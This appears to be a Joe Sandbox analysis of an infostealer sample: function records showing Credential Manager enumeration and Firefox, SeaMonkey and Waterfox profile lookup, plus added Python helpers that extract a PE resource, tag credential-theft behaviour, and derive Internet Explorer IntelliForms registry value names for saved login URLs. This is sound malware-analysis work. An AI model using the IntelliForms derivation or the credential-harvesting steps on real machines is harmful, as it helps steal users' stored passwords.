• ??2@YAPAXI@Z.MSVCRT(00000350), ref: 00412510
• GetModuleHandleW.KERNEL32(00000000,0000000E), ref: 00412582
• LoadIconW.USER32(00000000,00000065), ref: 0041258B
• wcscpy.MSVCRT ref: 004125A0
Strings
Memory Dump Source
• Source File: 00000010.00000002.2262655227.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_16_2_400000_DGlxtFUfY.jbxd
Similarity
• API ID: ??2@$HandleIconLoadModulememsetwcscpy
• String ID: r!A
• API String ID: 2791114272-628097481
• Opcode ID: c8dffcb2de6473715ddac6d72e3c76979a49d8854762dd44dbb162fd21f04a95
• Instruction ID: f2e108ad35b37ee9f58e8ef6409d1766b43f0b07df47584fb449e80907097569
• Opcode Fuzzy Hash: c8dffcb2de6473715ddac6d72e3c76979a49d8854762dd44dbb162fd21f04a95
• Instruction Fuzzy Hash: 0431A1B19013889FEB30EF669C896CAB7E8FF44314F00852FE90CCB241DBB946548B49

APIs
  • Part of subcall function 0040B1AB: free.MSVCRT ref: 0040B1AE
  • Part of subcall function 0040B1AB: free.MSVCRT ref: 0040B1B6
  • Part of subcall function 0040AA04: free.MSVCRT ref: 0040AA0B
  • Part of subcall function 0040C274: memset.MSVCRT ref: 0040C298
  • Part of subcall function 0040C274: FindFirstUrlCacheEntryW.WININET(visited:,?,80000001), ref: 0040C30D
  • Part of subcall function 0040C274: wcschr.MSVCRT ref: 0040C324
  • Part of subcall function 0040C274: wcschr.MSVCRT ref: 0040C344
  • Part of subcall function 0040C274: FindNextUrlCacheEntryW.WININET(?,?,80000001), ref: 0040C369
  • Part of subcall function 0040C274: GetLastError.KERNEL32 ref: 0040C373
  • Part of subcall function 0040C3C3: memset.MSVCRT ref: 0040C439
  • Part of subcall function 0040C3C3: RegEnumValueW.ADVAPI32(?,00000000,?,000000FF,00000000,?,00000000,?,?,?,?,?,00000000,?), ref: 0040C467
  • Part of subcall function 0040C3C3: _wcsupr.MSVCRT ref: 0040C481
  • Part of subcall function 0040C3C3: memset.MSVCRT ref: 0040C4D0
  • Part of subcall function 0040C3C3: RegEnumValueW.ADVAPI32(?,00000000,?,000000FF,00000000,?,00000000,?,?,?,000000FF,?,?,?,?,00000000), ref: 0040C4FB
• _wcslwr.MSVCRT ref: 0040C817
  • Part of subcall function 0040C634: wcslen.MSVCRT ref: 0040C65F
  • Part of subcall function 0040C634: memset.MSVCRT ref: 0040C6BF
• wcslen.MSVCRT ref: 0040C82C
Strings
Memory Dump Source
• Source File: 00000010.00000002.2262655227.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_16_2_400000_DGlxtFUfY.jbxd
Similarity
• API ID: memset$free$CacheEntryEnumFindValuewcschrwcslen$ErrorFirstLastNext_wcslwr_wcsupr
• String ID: /$/$http://www.facebook.com/$https://login.yahoo.com/config/login$https://www.google.com/accounts/servicelogin
• API String ID: 2936932814-4196376884
• Opcode ID: 2e55d37c3c93c49036042ab263f5962c07f69a8f438a79de627d7f97dd271f33
• Instruction ID: 5b72bd72183a146cc5fb8da473a5bce975bbff0c760a192580a28ed18ba85502
• Opcode Fuzzy Hash: 2e55d37c3c93c49036042ab263f5962c07f69a8f438a79de627d7f97dd271f33
• Instruction Fuzzy Hash: 42218272A00244A6CF10BB6A9C8589E7B68EF44744B10457BB804B7293D67CDE85DB9D

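The function above walks the WinInet cache with the "visited:" prefix, lower-cases each URL (_wcslwr), enumerates and upper-cases registry value names (RegEnumValueW, _wcsupr) and carries three hard-coded login URLs. That combination is the shape of the well-known recovery of Internet Explorer IntelliForms autocomplete entries, whose Storage2 registry value names are an uppercase hex SHA-1 of the lower-cased, NUL-terminated UTF-16LE URL followed by one checksum byte. The listing does not show the hash or the registry path, so that scheme is an assumption here, not something the report confirms. The Python below is an added example written for this report, not code from the sample or from Joe Sandbox; it derives the value name the sample would have to match for each of the three URLs and mirrors the case-insensitive comparison the listing sets up.

```python
import hashlib

# Constructed input: the three login URLs hard-coded in the function above.
HARDCODED_URLS = [
    "http://www.facebook.com/",
    "https://login.yahoo.com/config/login",
    "https://www.google.com/accounts/servicelogin",
]


def storage2_value_name(url):
    """Assumed IntelliForms Storage2 scheme (not shown in the listing): uppercase
    hex SHA-1 of the lower-cased URL as UTF-16LE including the terminating NUL,
    followed by one checksum byte (sum of the 20 digest bytes mod 256)."""
    canonical = url.lower().encode("utf-16-le") + b"\x00\x00"
    digest = hashlib.sha1(canonical).digest()
    checksum = sum(digest) & 0xFF
    return (digest.hex() + "%02x" % checksum).upper()


def matches_visited_url(registry_value_names, url):
    """Mirror of the comparison the sample sets up: value names are upper-cased
    (_wcsupr) and the cached URL lower-cased (_wcslwr) before they are compared,
    so case differences on either side must not break the match."""
    wanted = storage2_value_name(url)
    return any(name.upper() == wanted for name in registry_value_names)


def derive_all(urls=HARDCODED_URLS):
    """Value names the sample would need to find for each hard-coded URL."""
    return {u: storage2_value_name(u) for u in urls}


if __name__ == "__main__":
    for url, name in derive_all().items():
        print(name, url)
```

On a live host the value names under HKCU\Software\Microsoft\Internet Explorer\IntelliForms\Storage2 can be listed with reg query and passed to matches_visited_url to see which cached URLs the sample would be able to pair with a stored entry. Decryption of a matching value (CryptUnprotectData with the UTF-16LE URL as entropy) is deliberately left out: it needs the user's DPAPI key and is not shown in this listing.
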
APIs
• GetModuleHandleW.KERNEL32(00000000,00000000,?,?), ref: 0040B5A5
• FindResourceW.KERNELBASE(00000000,00000032,BIN), ref: 0040B5B6
• LoadResource.KERNEL32(00000000,00000000), ref: 0040B5C4
• SizeofResource.KERNEL32(?,00000000), ref: 0040B5D4
• LockResource.KERNEL32(00000000), ref: 0040B5DD
• memcpy.MSVCRT(00000000,00000000,00000000), ref: 0040B60D
Strings
Memory Dump Source
• Source File: 00000010.00000002.2262655227.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_16_2_400000_DGlxtFUfY.jbxd
Similarity
• API ID: Resource$FindHandleLoadLockModuleSizeofmemcpy
• String ID: BIN
• API String ID: 1668488027-1015027815
• Opcode ID: 6cadd12acd146c90b5568bc01b4485451bf9b169e768bef5838699a2d497f07b
• Instruction ID: e905eb6dc449d61379ecdc49350c1a2f8866219970738eecada31b95dd052af9
• Opcode Fuzzy Hash: 6cadd12acd146c90b5568bc01b4485451bf9b169e768bef5838699a2d497f07b
• Instruction Fuzzy Hash: 5E11C636C00225BBD7116BE2DC09AAFBA78FF85755F010476F81072292DB794D018BED

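The function above reads a resource from the sample's own module: GetModuleHandleW(NULL), FindResourceW with name 0x32 (50) and type "BIN", then LoadResource, SizeofResource, LockResource and a memcpy of the resource bytes into a buffer. The same blob can be pulled out of the dumped module statically by walking the PE resource directory through its three levels (type, name, language) to the data entry. The Python below is an added example written for this report, not code from the sample or from Joe Sandbox. It walks a raw .rsrc section image given its virtual address and, so that it runs offline, builds a constructed .rsrc blob for itself instead of reading the file; what the sample's "BIN"/50 resource contains is not stated in the listing and is not assumed here.

```python
import struct

SUBDIR = 0x80000000  # high bit: entry points to a sub-directory / string name


def _dir_entries(rsrc, off):
    """Yield (name_or_id, is_string_name, target_off, is_subdir) for every
    entry of the IMAGE_RESOURCE_DIRECTORY at section-relative offset `off`."""
    n_named, n_id = struct.unpack_from("<HH", rsrc, off + 12)
    pos = off + 16
    for _ in range(n_named + n_id):
        name, target = struct.unpack_from("<II", rsrc, pos)
        pos += 8
        yield (name & 0x7FFFFFFF, bool(name & SUBDIR),
               target & 0x7FFFFFFF, bool(target & SUBDIR))


def _read_name(rsrc, off):
    """IMAGE_RESOURCE_DIR_STRING_U: WORD length, then UTF-16LE chars (no NUL)."""
    (length,) = struct.unpack_from("<H", rsrc, off)
    return rsrc[off + 2:off + 2 + 2 * length].decode("utf-16-le")


def _matches(rsrc, name, is_string, wanted):
    """Match like FindResource: string names case-insensitively, IDs exactly."""
    if isinstance(wanted, str):
        return is_string and _read_name(rsrc, name).upper() == wanted.upper()
    return not is_string and name == wanted


def find_resource(rsrc, rsrc_rva, res_type, res_name):
    """Walk type -> name -> language and return the bytes of the first language
    variant of resource (res_type, res_name), or None if it is absent.
    `rsrc` is the raw .rsrc section image, `rsrc_rva` its virtual address."""
    for t_id, t_str, t_off, t_sub in _dir_entries(rsrc, 0):
        if not t_sub or not _matches(rsrc, t_id, t_str, res_type):
            continue
        for n_id, n_str, n_off, n_sub in _dir_entries(rsrc, t_off):
            if not n_sub or not _matches(rsrc, n_id, n_str, res_name):
                continue
            for _lang, _s, d_off, d_sub in _dir_entries(rsrc, n_off):
                if d_sub:
                    continue
                # IMAGE_RESOURCE_DATA_ENTRY: OffsetToData (an RVA), Size, CodePage, Reserved
                data_rva, size = struct.unpack_from("<II", rsrc, d_off)
                start = data_rva - rsrc_rva
                if start < 0 or start + size > len(rsrc):
                    raise ValueError("resource data lies outside the .rsrc image")
                return bytes(rsrc[start:start + size])
    return None


def build_rsrc_fixture(payload, decoy, rsrc_rva=0x5000):
    """Constructed test input (not taken from the sample): a .rsrc image holding
    "BIN"/50/0x409 -> payload and a decoy RT_RCDATA(10)/50/0x409 -> decoy, so a
    walker that ignored the type string would pick the wrong blob."""
    def directory(entries):
        named = sum(1 for n, _ in entries if n & SUBDIR)
        blob = struct.pack("<IIHHHH", 0, 0, 0, 0, named, len(entries) - named)
        return blob + b"".join(struct.pack("<II", n, t) for n, t in entries)

    # Fixed layout: directories of 2/1/1/1/1 entries (32+24*4 bytes), two
    # 16-byte data entries, the "BIN" name string, then the resource bytes.
    bin_names, bin_langs, rc_names, rc_langs = 0x20, 0x38, 0x50, 0x68
    bin_data, rc_data, name_str, payload_off = 0x80, 0x90, 0xA0, 0xA8
    decoy_off = payload_off + len(payload)
    out = bytearray()
    out += directory([(SUBDIR | name_str, SUBDIR | bin_names), (10, SUBDIR | rc_names)])
    out += directory([(50, SUBDIR | bin_langs)])
    out += directory([(0x409, bin_data)])
    out += directory([(50, SUBDIR | rc_langs)])
    out += directory([(0x409, rc_data)])
    out += struct.pack("<IIII", rsrc_rva + payload_off, len(payload), 0, 0)
    out += struct.pack("<IIII", rsrc_rva + decoy_off, len(decoy), 0, 0)
    out += struct.pack("<H", 3) + "BIN".encode("utf-16-le")
    out += payload + decoy
    return bytes(out), rsrc_rva


if __name__ == "__main__":
    rsrc, rva = build_rsrc_fixture(b"\xde\xad\xbe\xef" * 4, b"decoy")
    print(find_resource(rsrc, rva, "BIN", 50).hex())
```

For the real dropped file, feed find_resource the raw bytes of the .rsrc section and that section's VirtualAddress (pefile exposes both through its section list); the walker deliberately matches the type by its string name, since an RT_RCDATA resource with the same numeric name would otherwise be confused with the "BIN" one the sample asks for.
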
APIs
  • Part of subcall function 00404363: GetProcAddress.KERNEL32(?,00000000), ref: 00404398
  • Part of subcall function 00404363: GetProcAddress.KERNEL32(?,00000000), ref: 004043AC
  • Part of subcall function 00404363: GetProcAddress.KERNEL32(?,00000000), ref: 004043BF
  • Part of subcall function 00404363: GetProcAddress.KERNEL32(?,00000000), ref: 004043D3
  • Part of subcall function 00404363: GetProcAddress.KERNEL32(?,00000000), ref: 004043E7
• CredEnumerateW.ADVAPI32(00000000,00000000,?,?,?,00000000,?), ref: 0040BDE9
• wcslen.MSVCRT ref: 0040BE06
• wcsncmp.MSVCRT ref: 0040BE38
• memset.MSVCRT ref: 0040BE91
• memcpy.MSVCRT(?,?,?,00000001,?,?,?,00000000,?), ref: 0040BEB2
• _wcsnicmp.MSVCRT ref: 0040BEFC
• wcschr.MSVCRT ref: 0040BF24
• LocalFree.KERNEL32(?,?,?,?,00000001,?,?,?,00000000,?), ref: 0040BF48
Memory Dump Source
• Source File: 00000010.00000002.2262655227.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_16_2_400000_DGlxtFUfY.jbxd
Similarity
• API ID: AddressProc$CredEnumerateFreeLocal_wcsnicmpmemcpymemsetwcschrwcslenwcsncmp
• String ID:
• API String ID: 697348961-0
• Opcode ID: 4320d3521706fdf8c6ed48fb05be967b0956d3d4dbd01890db6896aba47bd834
• Instruction ID: 79a9ca8399314c5bcb3e205da5602351372edcdcc58f79068602210d8f55f42f
• Opcode Fuzzy Hash: 4320d3521706fdf8c6ed48fb05be967b0956d3d4dbd01890db6896aba47bd834
                                                                                                                                                • Instruction Fuzzy Hash: 1851E9B5D002099FCF20DFA5C8859AEBBF9FF48304F10452AE919F7251E734A9458F69
                                                                                                                                                APIs
                                                                                                                                                • memset.MSVCRT ref: 00403CBF
                                                                                                                                                • memset.MSVCRT ref: 00403CD4
                                                                                                                                                • memset.MSVCRT ref: 00403CE9
                                                                                                                                                • memset.MSVCRT ref: 00403CFE
                                                                                                                                                • memset.MSVCRT ref: 00403D13
                                                                                                                                                  • Part of subcall function 00414C2E: memset.MSVCRT ref: 00414C87
                                                                                                                                                  • Part of subcall function 00414C2E: RegCloseKey.ADVAPI32(00445DDE,?,?,?,?,?,00000000), ref: 00414CEE
                                                                                                                                                  • Part of subcall function 00414C2E: wcscpy.MSVCRT ref: 00414CFC
                                                                                                                                                  • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D29
                                                                                                                                                  • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D33
                                                                                                                                                  • Part of subcall function 00409D1F: wcscpy.MSVCRT ref: 00409D47
                                                                                                                                                  • Part of subcall function 00409D1F: wcscat.MSVCRT ref: 00409D55
                                                                                                                                                  • Part of subcall function 0040414F: memset.MSVCRT ref: 00404172
                                                                                                                                                  • Part of subcall function 0040414F: wcscpy.MSVCRT ref: 004041D6
                                                                                                                                                  • Part of subcall function 0040414F: wcscpy.MSVCRT ref: 004041E7
                                                                                                                                                  • Part of subcall function 0040414F: memset.MSVCRT ref: 00404200
                                                                                                                                                  • Part of subcall function 0040414F: memset.MSVCRT ref: 00404215
                                                                                                                                                  • Part of subcall function 0040414F: _snwprintf.MSVCRT ref: 0040422F
                                                                                                                                                  • Part of subcall function 0040414F: wcscpy.MSVCRT ref: 00404242
                                                                                                                                                • memset.MSVCRT ref: 00403DDA
                                                                                                                                                  • Part of subcall function 004099C6: wcslen.MSVCRT ref: 004099CD
                                                                                                                                                  • Part of subcall function 004099C6: memcpy.MSVCRT(?,?,00000104,?,0040BAA5,00445FAE), ref: 004099E3
                                                                                                                                                Strings
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000010.00000002.2262655227.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_16_2_400000_DGlxtFUfY.jbxd
                                                                                                                                                Similarity
                                                                                                                                                • API ID: memset$wcscpy$wcslen$Close_snwprintfmemcpywcscat
                                                                                                                                                • String ID: Waterfox$Waterfox\Profiles
                                                                                                                                                • API String ID: 3527940856-11920434
                                                                                                                                                • Opcode ID: fa7a89f4834ef8b5b40aee994800d4865c67d250ea9d7d7a0362dcd02f226988
                                                                                                                                                • Instruction ID: d72014143a293005b417e5222852f61d3cfc405123c5957a7e6d01a12b636873
                                                                                                                                                • Opcode Fuzzy Hash: fa7a89f4834ef8b5b40aee994800d4865c67d250ea9d7d7a0362dcd02f226988
                                                                                                                                                • Instruction Fuzzy Hash: 1E4133B294012C7ADB20EB56DC85ECF777CEF85314F1180ABB509B2181DA745B948FAA
                                                                                                                                                APIs
                                                                                                                                                • memset.MSVCRT ref: 00403E50
                                                                                                                                                • memset.MSVCRT ref: 00403E65
                                                                                                                                                • memset.MSVCRT ref: 00403E7A
                                                                                                                                                • memset.MSVCRT ref: 00403E8F
                                                                                                                                                • memset.MSVCRT ref: 00403EA4
                                                                                                                                                  • Part of subcall function 00414C2E: memset.MSVCRT ref: 00414C87
                                                                                                                                                  • Part of subcall function 00414C2E: RegCloseKey.ADVAPI32(00445DDE,?,?,?,?,?,00000000), ref: 00414CEE
                                                                                                                                                  • Part of subcall function 00414C2E: wcscpy.MSVCRT ref: 00414CFC
                                                                                                                                                  • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D29
                                                                                                                                                  • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D33
                                                                                                                                                  • Part of subcall function 00409D1F: wcscpy.MSVCRT ref: 00409D47
                                                                                                                                                  • Part of subcall function 00409D1F: wcscat.MSVCRT ref: 00409D55
                                                                                                                                                  • Part of subcall function 0040414F: memset.MSVCRT ref: 00404172
                                                                                                                                                  • Part of subcall function 0040414F: wcscpy.MSVCRT ref: 004041D6
                                                                                                                                                  • Part of subcall function 0040414F: wcscpy.MSVCRT ref: 004041E7
                                                                                                                                                  • Part of subcall function 0040414F: memset.MSVCRT ref: 00404200
                                                                                                                                                  • Part of subcall function 0040414F: memset.MSVCRT ref: 00404215
                                                                                                                                                  • Part of subcall function 0040414F: _snwprintf.MSVCRT ref: 0040422F
                                                                                                                                                  • Part of subcall function 0040414F: wcscpy.MSVCRT ref: 00404242
                                                                                                                                                • memset.MSVCRT ref: 00403F6B
                                                                                                                                                  • Part of subcall function 004099C6: wcslen.MSVCRT ref: 004099CD
                                                                                                                                                  • Part of subcall function 004099C6: memcpy.MSVCRT(?,?,00000104,?,0040BAA5,00445FAE), ref: 004099E3
                                                                                                                                                Strings
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000010.00000002.2262655227.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_16_2_400000_DGlxtFUfY.jbxd
                                                                                                                                                Similarity
                                                                                                                                                • API ID: memset$wcscpy$wcslen$Close_snwprintfmemcpywcscat
                                                                                                                                                • String ID: Mozilla\SeaMonkey$Mozilla\SeaMonkey\Profiles
                                                                                                                                                • API String ID: 3527940856-2068335096
                                                                                                                                                • Opcode ID: 4e0f951fde323d6a6ece029bc301e1d43e2d4c472937678d86f27e99a49f71a6
                                                                                                                                                • Instruction ID: badb9319ce56d3a3e0b5d4601891faab39f88fc9b3936f94b46873e2979bc7df
                                                                                                                                                • Opcode Fuzzy Hash: 4e0f951fde323d6a6ece029bc301e1d43e2d4c472937678d86f27e99a49f71a6
                                                                                                                                                • Instruction Fuzzy Hash: F94133B294012CBADB20EB56DC85FCF777CAF85314F1180A7B509F2181DA785B848F6A
                                                                                                                                                APIs
                                                                                                                                                • memset.MSVCRT ref: 00403FE1
                                                                                                                                                • memset.MSVCRT ref: 00403FF6
                                                                                                                                                • memset.MSVCRT ref: 0040400B
                                                                                                                                                • memset.MSVCRT ref: 00404020
                                                                                                                                                • memset.MSVCRT ref: 00404035
                                                                                                                                                  • Part of subcall function 00414C2E: memset.MSVCRT ref: 00414C87
                                                                                                                                                  • Part of subcall function 00414C2E: RegCloseKey.ADVAPI32(00445DDE,?,?,?,?,?,00000000), ref: 00414CEE
                                                                                                                                                  • Part of subcall function 00414C2E: wcscpy.MSVCRT ref: 00414CFC
                                                                                                                                                  • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D29
                                                                                                                                                  • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D33
                                                                                                                                                  • Part of subcall function 00409D1F: wcscpy.MSVCRT ref: 00409D47
                                                                                                                                                  • Part of subcall function 00409D1F: wcscat.MSVCRT ref: 00409D55
                                                                                                                                                  • Part of subcall function 0040414F: memset.MSVCRT ref: 00404172
                                                                                                                                                  • Part of subcall function 0040414F: wcscpy.MSVCRT ref: 004041D6
                                                                                                                                                  • Part of subcall function 0040414F: wcscpy.MSVCRT ref: 004041E7
                                                                                                                                                  • Part of subcall function 0040414F: memset.MSVCRT ref: 00404200
                                                                                                                                                  • Part of subcall function 0040414F: memset.MSVCRT ref: 00404215
                                                                                                                                                  • Part of subcall function 0040414F: _snwprintf.MSVCRT ref: 0040422F
                                                                                                                                                  • Part of subcall function 0040414F: wcscpy.MSVCRT ref: 00404242
                                                                                                                                                • memset.MSVCRT ref: 004040FC
                                                                                                                                                  • Part of subcall function 004099C6: wcslen.MSVCRT ref: 004099CD
                                                                                                                                                  • Part of subcall function 004099C6: memcpy.MSVCRT(?,?,00000104,?,0040BAA5,00445FAE), ref: 004099E3
                                                                                                                                                Strings
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000010.00000002.2262655227.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_16_2_400000_DGlxtFUfY.jbxd
                                                                                                                                                Similarity
                                                                                                                                                • API ID: memset$wcscpy$wcslen$Close_snwprintfmemcpywcscat
                                                                                                                                                • String ID: Mozilla\Firefox$Mozilla\Firefox\Profiles
                                                                                                                                                • API String ID: 3527940856-3369679110
                                                                                                                                                • Opcode ID: e8b210b2701fced3ec1563677da70e7bdaed7d27e85ea88c95246b73557c45d8
                                                                                                                                                • Instruction ID: a33c26704871042caa7cb74448a1974e70df039046fe21947f04a6d8cbe9f93a
                                                                                                                                                • Opcode Fuzzy Hash: e8b210b2701fced3ec1563677da70e7bdaed7d27e85ea88c95246b73557c45d8
                                                                                                                                                • Instruction Fuzzy Hash: 354134B294012CBADB20EB56DC85ECF777CAF85314F1180A7B509B3181EA745B948F6A
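Read together, the function records above describe the credential-access side of the unpacked payload in memory dump 00000010.00000002.2262655227.0000000000400000: one routine walks the Windows Credential Manager with CredEnumerateW (the same function also resolves its imports at run time through GetProcAddress), and three near-identical routines, differing only in their string references, build the profile directories for Waterfox, SeaMonkey and Firefox (the Gecko browsers whose login and cookie stores live under those paths). The script below is an added example, not part of the Joe Sandbox report or of the sample's own code: it parses function records written in this listing's format and tags each one with the behaviour its API and string mix implies. The tag names, the matching rules and the condensed sample records embedded in it are my own construction; the rules are heuristics drawn from this listing, not a Joe Sandbox signature.

```python
"""Tag Joe Sandbox function-level API records by the credential-access
behaviour they imply.  Added example; not part of the sandbox report."""
import re
from dataclasses import dataclass, field

# "• api.MODULE(args), ref: ADDR" or "• Part of subcall function ADDR: api.MODULE ref: ADDR"
API_RE = re.compile(
    r"^•\s*(?:Part of subcall function (?P<caller>[0-9A-F]{8}):\s*)?"
    r"(?P<api>[A-Za-z_]\w*)\.(?P<module>[A-Za-z0-9_]+)"
    r"(?:\((?P<args>[^)]*)\))?,?\s*ref:\s*(?P<ref>[0-9A-F]{8})$"
)
# "• Key: value" metadata rows (String ID, Opcode ID, ...)
FIELD_RE = re.compile(r"^•\s*(?P<key>[A-Za-z ]+?):\s*(?P<value>.*)$")

# Heuristic indicators, chosen from the strings and APIs in this listing (assumption).
GECKO_PROFILE_DIRS = ("Mozilla\\Firefox\\Profiles", "Mozilla\\SeaMonkey\\Profiles", "Waterfox\\Profiles")
SQLITE_MARKERS = ("no such vfs: %s", "NOCASE", "RTRIM")  # strings from a statically linked SQLite
DYNAMIC_RESOLVE = {"GetSystemDirectoryW", "LoadLibraryW", "GetProcAddress"}


@dataclass
class FunctionRecord:
    opcode_id: str = ""
    direct_apis: list = field(default_factory=list)   # (api, module, ref)
    subcall_apis: list = field(default_factory=list)  # (caller, api, module, ref)
    strings: list = field(default_factory=list)       # split from the "String ID" row


def parse_records(text):
    """Split the listing into per-function records; each record starts at an 'APIs' header."""
    records, cur = [], FunctionRecord()

    def flush():
        if cur.opcode_id or cur.direct_apis or cur.subcall_apis:
            records.append(cur)

    for raw in text.splitlines():
        line = raw.strip()
        if not line:
            continue
        if line == "APIs":
            flush()
            cur = FunctionRecord()
            continue
        m = API_RE.match(line)
        if m:
            if m["caller"]:
                cur.subcall_apis.append((m["caller"], m["api"], m["module"], m["ref"]))
            else:
                cur.direct_apis.append((m["api"], m["module"], m["ref"]))
            continue
        f = FIELD_RE.match(line)
        if f and f["key"] == "String ID":
            cur.strings = [s for s in f["value"].split("$") if s]  # '$' separates strings
        elif f and f["key"] == "Opcode ID":
            cur.opcode_id = f["value"]
    flush()
    return records


def tag_record(rec):
    """Return the set of behaviour tags implied by one record's APIs and strings."""
    apis = {a for a, _, _ in rec.direct_apis} | {a for _, a, _, _ in rec.subcall_apis}
    tags = set()
    if "CredEnumerateW" in apis:
        tags.add("credman-enumeration")       # dumps Windows Credential Manager entries
    if any(s in GECKO_PROFILE_DIRS for s in rec.strings):
        tags.add("gecko-profile-lookup")      # builds Firefox/SeaMonkey/Waterfox profile paths
    if any(s in SQLITE_MARKERS for s in rec.strings):
        tags.add("embedded-sqlite")           # SQLite engine for reading browser databases
    if DYNAMIC_RESOLVE <= apis:
        tags.add("dynamic-api-resolution")    # LoadLibraryW + GetProcAddress import hiding
    return tags


def summarize(text):
    """[(opcode_id prefix, sorted tags)] for every record in the listing."""
    return [(r.opcode_id[:8], sorted(tag_record(r))) for r in parse_records(text)]


# Constructed sample: condensed from four records of the listing above.
SAMPLE = """\
APIs
  • Part of subcall function 00404363: GetProcAddress.KERNEL32(?,00000000), ref: 004043BF
• CredEnumerateW.ADVAPI32(00000000,00000000,?,?,?,00000000,?), ref: 0040BDE9
• wcslen.MSVCRT ref: 0040BE06
• LocalFree.KERNEL32(?,?,?,?,00000001,?,?,?,00000000,?), ref: 0040BF48
• String ID:
• Opcode ID: 4320d3521706fdf8c6ed48fb05be967b0956d3d4dbd01890db6896aba47bd834
APIs
• memset.MSVCRT ref: 00403CBF
  • Part of subcall function 0040414F: _snwprintf.MSVCRT ref: 0040422F
• String ID: Waterfox$Waterfox\\Profiles
• Opcode ID: fa7a89f4834ef8b5b40aee994800d4865c67d250ea9d7d7a0362dcd02f226988
APIs
• memcpy.MSVCRT(00000048,00451D40,0000002C,000003FF,00445FAE,?,00000000,?,0040B879), ref: 004444E3
• String ID: BINARY$NOCASE$RTRIM$main$no such vfs: %s$temp
• Opcode ID: 821e0fdd347fba4e0959882d1eed221cd0f9849de050a87fd0c537b7ccc40074
APIs
  • Part of subcall function 0040A804: GetSystemDirectoryW.KERNEL32(0045DE68,00000104), ref: 0040A841
  • Part of subcall function 0040A804: LoadLibraryW.KERNELBASE(00000000,?,?,?,?,?,?,?), ref: 0040A87B
• GetProcAddress.KERNEL32(00000000,00000000), ref: 004449E7
"""

if __name__ == "__main__":
    for opcode_prefix, tags in summarize(SAMPLE):
        print(f"{opcode_prefix or '(no opcode id)':>14}  {', '.join(tags) or '-'}")
```

Feeding the whole "APIs" listing of a report through `summarize` gives a quick map of which functions to open first in the disassembly; the tags are only as good as the indicator lists, so extend GECKO_PROFILE_DIRS and SQLITE_MARKERS from the String ID rows of the report you are reading rather than treating them as complete.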
                                                                                                                                                APIs
                                                                                                                                                • memcpy.MSVCRT(00000048,00451D40,0000002C,000003FF,00445FAE,?,00000000,?,0040B879), ref: 004444E3
                                                                                                                                                Strings
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000010.00000002.2262655227.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_16_2_400000_DGlxtFUfY.jbxd
                                                                                                                                                Similarity
                                                                                                                                                • API ID: memcpy
                                                                                                                                                • String ID: BINARY$NOCASE$RTRIM$main$no such vfs: %s$temp
                                                                                                                                                • API String ID: 3510742995-2641926074
                                                                                                                                                • Opcode ID: 821e0fdd347fba4e0959882d1eed221cd0f9849de050a87fd0c537b7ccc40074
                                                                                                                                                • Instruction ID: 565814064bb2237b40e40c3ad6633df45ffc5137317807aec9a32ad89077b3bf
                                                                                                                                                • Opcode Fuzzy Hash: 821e0fdd347fba4e0959882d1eed221cd0f9849de050a87fd0c537b7ccc40074
                                                                                                                                                • Instruction Fuzzy Hash: BA7119B1600701BFE710AF16CC81B66B7A8BB85319F11452FF4189B742D7BDED908B99
                                                                                                                                                APIs
                                                                                                                                                  • Part of subcall function 0040B633: free.MSVCRT ref: 0040B63A
                                                                                                                                                  • Part of subcall function 0044553B: memset.MSVCRT ref: 004455C2
                                                                                                                                                  • Part of subcall function 0044553B: wcsrchr.MSVCRT ref: 004455DA
                                                                                                                                                • memset.MSVCRT ref: 004033B7
                                                                                                                                                • memcpy.MSVCRT(?,00000000,0000121C), ref: 004033D0
                                                                                                                                                • wcscmp.MSVCRT ref: 004033FC
                                                                                                                                                • _wcsicmp.MSVCRT ref: 00403439
                                                                                                                                                Strings
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000010.00000002.2262655227.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_16_2_400000_DGlxtFUfY.jbxd
                                                                                                                                                Similarity
                                                                                                                                                • API ID: memset$_wcsicmpfreememcpywcscmpwcsrchr
                                                                                                                                                • String ID: $0.@
                                                                                                                                                • API String ID: 2758756878-1896041820
                                                                                                                                                • Opcode ID: f66ff37cfebf4588bd42dffc34473b3fc2588101413319c72ad25ea5b69c0f44
                                                                                                                                                • Instruction ID: ab192eb15c9642abc1a13bae453f9d52c7669558764b377fc560e22e349fc473
                                                                                                                                                • Opcode Fuzzy Hash: f66ff37cfebf4588bd42dffc34473b3fc2588101413319c72ad25ea5b69c0f44
                                                                                                                                                • Instruction Fuzzy Hash: 6B414A71A0C3819BD770EF65C885A8BB7E8AF86314F004D2FE48C97681DB3899458B5B
APIs
  • Part of subcall function 0040A804: memset.MSVCRT ref: 0040A824
